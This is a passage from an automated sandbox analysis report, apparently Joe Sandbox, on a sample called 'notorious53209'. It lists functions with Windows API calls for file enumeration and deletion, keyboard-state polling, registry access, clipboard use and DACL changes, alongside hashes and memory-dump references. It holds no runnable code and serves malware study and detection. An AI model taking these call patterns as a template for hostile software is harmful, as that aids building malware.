                                                  • Opcode Fuzzy Hash: 9232d8abb2c51f4a0ecc46b63ca614a137fbf43d56a360a458fb32ac073e6693
                                                  • Instruction Fuzzy Hash: FD023B752046119FDB14EF18C891E2ABBE5FF89714F04885DF98ADB6A2CB34ED41CB42
                                                  Function 0090C8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfilenativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • DragQueryPoint.SHELL32(?,?), ref: 0090C917
                                                    • Part of subcall function 0090ADF1: ClientToScreen.USER32(?,?), ref: 0090AE1A
                                                    • Part of subcall function 0090ADF1: GetWindowRect.USER32(?,?), ref: 0090AE90
                                                    • Part of subcall function 0090ADF1: PtInRect.USER32(?,?,0090C304), ref: 0090AEA0
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0090C980
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0090C98B
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0090C9AE
                                                  • _wcscat.LIBCMT ref: 0090C9DE
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0090C9F5
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0090CA0E
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0090CA25
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0090CA47
                                                  • DragFinish.SHELL32(?), ref: 0090CA4E
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 0090CB41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                  • API String ID: 2166380349-3440237614
                                                  • Opcode ID: c54808ed4a5c70c78e8ecc4177a9f1e17e85ed68b2e257832108a9c63119c7c2
                                                  • Instruction ID: dcb071adb37ad0560bf581424609046745eb2438cc217b5e87e51a61c0938040
                                                  • Opcode Fuzzy Hash: c54808ed4a5c70c78e8ecc4177a9f1e17e85ed68b2e257832108a9c63119c7c2
                                                  • Instruction Fuzzy Hash: 766149B2108301AFC711EF64CC85D9BBBE8FFC9714F400A2EF592961A1DB709A49CB52
                                                  Function 008EF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 008EF37E
                                                  • _wcscmp.LIBCMT ref: 008EF393
                                                  • _wcscmp.LIBCMT ref: 008EF3AA
                                                    • Part of subcall function 008E45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008E45DC
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 008EF3D9
                                                  • FindClose.KERNEL32(00000000), ref: 008EF3E4
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF400
                                                  • _wcscmp.LIBCMT ref: 008EF427
                                                  • _wcscmp.LIBCMT ref: 008EF43E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF450
                                                  • SetCurrentDirectoryW.KERNEL32(0093A5A0), ref: 008EF46E
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF478
                                                  • FindClose.KERNEL32(00000000), ref: 008EF485
                                                  • FindClose.KERNEL32(00000000), ref: 008EF497
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 1824444939-438819550
                                                  • Opcode ID: 9f51499a0341645785805ac4aca2c7593725b71bc94460f653ddc8477ae57a10
                                                  • Instruction ID: e0a710e4c2f9acfd2dc897598e3179e14166cd628844f5067034d050b53d2d61
                                                  • Opcode Fuzzy Hash: 9f51499a0341645785805ac4aca2c7593725b71bc94460f653ddc8477ae57a10
                                                  • Instruction Fuzzy Hash: D331E4725002596FDB20AB69EC98ADE73ACEF4A368F100175F950E21E2D730DA44CB54
                                                  Function 0090C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0090C4EC
                                                  • GetFocus.USER32 ref: 0090C4FC
                                                  • GetDlgCtrlID.USER32(00000000), ref: 0090C507
                                                  • _memset.LIBCMT ref: 0090C632
                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0090C65D
                                                  • GetMenuItemCount.USER32(?), ref: 0090C67D
                                                  • GetMenuItemID.USER32(?,00000000), ref: 0090C690
                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0090C6C4
                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0090C70C
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0090C744
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 0090C779
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                                  • String ID: 0
                                                  • API String ID: 3616455698-4108050209
                                                  • Opcode ID: 0611594f9bf75acb9e32d6a3a6248eafcceba2710a13dec1eb27a79fb45667a8
                                                  • Instruction ID: b8802dccc7a9f6bbe5d7999d954b9dfcd8debccb969f1d5b1c528e05d5048587
                                                  • Opcode Fuzzy Hash: 0611594f9bf75acb9e32d6a3a6248eafcceba2710a13dec1eb27a79fb45667a8
                                                  • Instruction Fuzzy Hash: D3818BB5608301AFD720DF24C884A6BBBE8FF89314F100A2DF99597291D771E945DFA2
                                                  Function 008D81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008D8766
                                                    • Part of subcall function 008D874A: GetLastError.KERNEL32(?,008D822A,?,?,?), ref: 008D8770
                                                    • Part of subcall function 008D874A: GetProcessHeap.KERNEL32(00000008,?,?,008D822A,?,?,?), ref: 008D877F
                                                    • Part of subcall function 008D874A: RtlAllocateHeap.NTDLL(00000000,?,008D822A), ref: 008D8786
                                                    • Part of subcall function 008D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008D879D
                                                    • Part of subcall function 008D87E7: GetProcessHeap.KERNEL32(00000008,008D8240,00000000,00000000,?,008D8240,?), ref: 008D87F3
                                                    • Part of subcall function 008D87E7: RtlAllocateHeap.NTDLL(00000000,?,008D8240), ref: 008D87FA
                                                    • Part of subcall function 008D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,008D8240,?), ref: 008D880B
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 008D825B
                                                  • _memset.LIBCMT ref: 008D8270
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 008D828F
                                                  • GetLengthSid.ADVAPI32(?), ref: 008D82A0
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 008D82DD
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008D82F9
                                                  • GetLengthSid.ADVAPI32(?), ref: 008D8316
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 008D8325
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 008D832C
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 008D834D
                                                  • CopySid.ADVAPI32(00000000), ref: 008D8354
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 008D8385
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008D83AB
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 008D83BF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 2347767575-0
                                                  • Opcode ID: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
                                                  • Instruction ID: 6ecce5e3f2ffa4801e11e2d34a7f0feac3ffd49aa413f8db672e8b0c50cb6ee7
                                                  • Opcode Fuzzy Hash: 7ee7ee7007342e6918dd8b0baa9828fec64f1846ac8adb0747e40917ed420a63
                                                  • Instruction Fuzzy Hash: 3D615671904209EFDF14DFA4DC94AAEBBB9FF04B00F04822AE815E6391DB319A15DB60
                                                  Function 00896843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                  • API String ID: 0-4052911093
                                                  • Opcode ID: 060c4d8b011cf725ed310c5987e8d2a3618d8e53f6f84d9e2c997f5d71181a91
                                                  • Instruction ID: bc71180da7f2b1d62bfcd1d9cbfd02470ea2e11bac71063307b2e61e993c1a5d
                                                  • Opcode Fuzzy Hash: 060c4d8b011cf725ed310c5987e8d2a3618d8e53f6f84d9e2c997f5d71181a91
                                                  • Instruction Fuzzy Hash: 77726D71E00219DBDF24DF58C8947AEB7B5FF48314F18816AE859EB394EB309981CB90
                                                  Function 00900665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?), ref: 009010BC
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900737
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009007D6
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0090086E
                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00900AAD
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00900ABA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1240663315-0
                                                  • Opcode ID: 69a4eab826c2e4018065c97990aed0ab2238c2c75e611263964a96fa35377060
                                                  • Instruction ID: f1ba15ba4a41e4443e2a5e9b1113f78b6e3ca78f65e6a81934068bde0d55a3d5
                                                  • Opcode Fuzzy Hash: 69a4eab826c2e4018065c97990aed0ab2238c2c75e611263964a96fa35377060
                                                  • Instruction Fuzzy Hash: D3E12E71204210AFCB14DF29C895E6ABBE9FF89714F04896DF499D72A2DB30ED05CB52
                                                  Function 008E0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 008E0241
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 008E02C2
                                                  • GetKeyState.USER32(000000A0), ref: 008E02DD
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 008E02F7
                                                  • GetKeyState.USER32(000000A1), ref: 008E030C
                                                  • GetAsyncKeyState.USER32(00000011), ref: 008E0324
                                                  • GetKeyState.USER32(00000011), ref: 008E0336
                                                  • GetAsyncKeyState.USER32(00000012), ref: 008E034E
                                                  • GetKeyState.USER32(00000012), ref: 008E0360
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 008E0378
                                                  • GetKeyState.USER32(0000005B), ref: 008E038A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: 16a752a1844f4cfb7a893889078b4c6b2d7d3b73a2a40f74da74c83c7bb503f4
                                                  • Instruction ID: 03040ae3032a38d42f26c665fb19b94ef6e4b652406833fdde7159c4f5c3aaef
                                                  • Opcode Fuzzy Hash: 16a752a1844f4cfb7a893889078b4c6b2d7d3b73a2a40f74da74c83c7bb503f4
                                                  • Instruction Fuzzy Hash: 5D41BB245087C96EFF324A6598183B5BEE0FB13344F48489DD6C5C66C3D7D499C88FA1
                                                  Function 008F86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                  • CoInitialize.OLE32 ref: 008F8718
                                                  • CoUninitialize.OLE32 ref: 008F8723
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00912BEC,?), ref: 008F8783
                                                  • IIDFromString.OLE32(?,?), ref: 008F87F6
                                                  • VariantInit.OLEAUT32(?), ref: 008F8890
                                                  • VariantClear.OLEAUT32(?), ref: 008F88F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 834269672-1287834457
                                                  • Opcode ID: 2f49a8678c3587c7f5f5031fd12832521cd1690fc16c84fe72d0c69f0251bb8b
                                                  • Instruction ID: 53a8c905cc3e83a3304c78eb13cd8bc410f0143e9816495f96412a47f680083c
                                                  • Opcode Fuzzy Hash: 2f49a8678c3587c7f5f5031fd12832521cd1690fc16c84fe72d0c69f0251bb8b
                                                  • Instruction Fuzzy Hash: 75617830618305DFD710EF24C848B6ABBE8FF88754F144829FA85DB291CB60ED44CB92
                                                  Function 008F4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: 74876212b9e3bea53b079f4fe660fcc5f0c4df91c478da92ad891a638c87fec4
                                                  • Instruction ID: b89c7669cfc068e88373e41286caf24293202f9d0bfeda4bf3b87476d8685817
                                                  • Opcode Fuzzy Hash: 74876212b9e3bea53b079f4fe660fcc5f0c4df91c478da92ad891a638c87fec4
                                                  • Instruction Fuzzy Hash: 5B21D3352152289FDB20AF68EC59F7A77A8FF04310F148016F946DB261DB71AD00DB85
                                                  Function 008E3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                                                    • Part of subcall function 008E4CD3: GetFileAttributesW.KERNEL32(?,008E3947), ref: 008E4CD4
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 008E3ADF
                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 008E3B87
                                                  • MoveFileW.KERNEL32(?,?), ref: 008E3B9A
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 008E3BB7
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 008E3BD9
                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008E3BF5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 4002782344-1173974218
                                                  • Opcode ID: 2db68a4555834e728db67b68d384beb9f546e2020cbc3a96e339c892a4e3766a
                                                  • Instruction ID: 12b8ad53567dc19553f188e471a2c20783d1c7bb46543a3b689d75788f9896ed
                                                  • Opcode Fuzzy Hash: 2db68a4555834e728db67b68d384beb9f546e2020cbc3a96e339c892a4e3766a
                                                  • Instruction Fuzzy Hash: 46518C318041999ACB15FBA5CE968EDB7B8FF55300F2441A9E442B7091EF30AF09CB62
                                                  Function 008EF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 008EF6AB
                                                  • Sleep.KERNEL32(0000000A), ref: 008EF6DB
                                                  • _wcscmp.LIBCMT ref: 008EF6EF
                                                  • _wcscmp.LIBCMT ref: 008EF70A
                                                  • FindNextFileW.KERNEL32(?,?), ref: 008EF7A8
                                                  • FindClose.KERNEL32(00000000), ref: 008EF7BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                  • String ID: *.*
                                                  • API String ID: 713712311-438819550
                                                  • Opcode ID: b93f0816b15e780ddf6f3fbdf06535aeb8a53211460819fd18b23ab3e35204d8
                                                  • Instruction ID: cf10448efb3e079526449cb997e4cf6ea894aa01f524b1ce5314a4f37b384da7
